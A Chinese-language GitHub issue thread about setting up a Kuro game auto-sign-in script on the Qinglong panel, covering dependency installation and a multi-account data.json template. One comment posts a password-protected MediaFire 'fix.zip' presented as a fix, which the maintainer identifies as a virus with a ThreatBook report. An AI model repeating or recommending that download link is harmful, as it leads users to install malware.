### ISSUE TITLE
请求完善教程

### ISSUE THREAD

**Issue by sunshine-yckx** [mxyooR/Kuro-autosignin#14]
作者你好，请问可以完善一下青龙的教程吗，按照你给的流程，青龙跑不起来签到脚本

**Comment by sunshine-yckx** [comment]
tools.py 跑不起来（不想手动抓包）

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mxyooR** [comment]
tools在本地跑

**Comment by mxyooR** [comment]
按这个装环境依赖

NodeJS
国内: https://nodejs.cn/download/
官网: Node.js — Download Node.js® (nodejs.org)
Python 环境
pip install -r ./requirements.txt
若使用 pip install -r ./requirements.txt 安装失败，则按以下顺序进行单独安装依赖

pip install ddddocr
pip install numpy==1.26.2 请勿使用 numpy2，会报错
pip install PyExecJS
pip install loguru
pip install requests

**Comment by mxyooR** [comment]
刚才那个发的是个病毒 你下了吗？

**Comment by mxyooR** [comment]
https://s.threatbook.com/report/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

**Comment by sunshine-yckx** [comment]
作者你好，我没有下载那个人发的文件。此外，脚本是否可以优化，data.json中有些参数应该是不需要的，就是mc和战双签到所用的id，我现在在用别人的脚本，他在进行签到时不需要那些参数（wwroleId、eeeroleId），当然这两参数我手动抓包也没有找到

**Comment by sunshine-yckx** [comment]
请问多账号签到功能有支持吗，我在教程中没有发现

**Comment by mxyooR** [comment]
{
    "push":1,
    "distinct_id": "抓包获取",
    "users": [

        {
            "name" : "被签到者的姓名",
            "wwroleId": "可以抓包获取 鸣潮的uid 不签到不填空着",
            "eeeroleId": "可以抓包获取 站双的uid 不签到不填空着",
            "tokenraw": "抓包获取的token",
            "userId": "库街区的id 可以抓包获取",
            "devCode":"设备代码 可以随机生成或者抓包获取"
        },
       {
            "name" : "被签到者的姓名",
            "wwroleId": "可以抓包获取 鸣潮的uid 不签到不填空着",
            "eeeroleId": "可以抓包获取 站双的uid 不签到不填空着",
            "tokenraw": "抓包获取的token",
            "userId": "库街区的id 可以抓包获取",
            "devCode":"设备代码 可以随机生成或者抓包获取"
        }

    ]
}

**Comment by mxyooR** [comment]
data.json多放几个user就行

**Comment by sunshine-yckx** [comment]
那么distinct_id就是一样的咯

**Comment by mxyooR** [comment]
en 这个没关系的
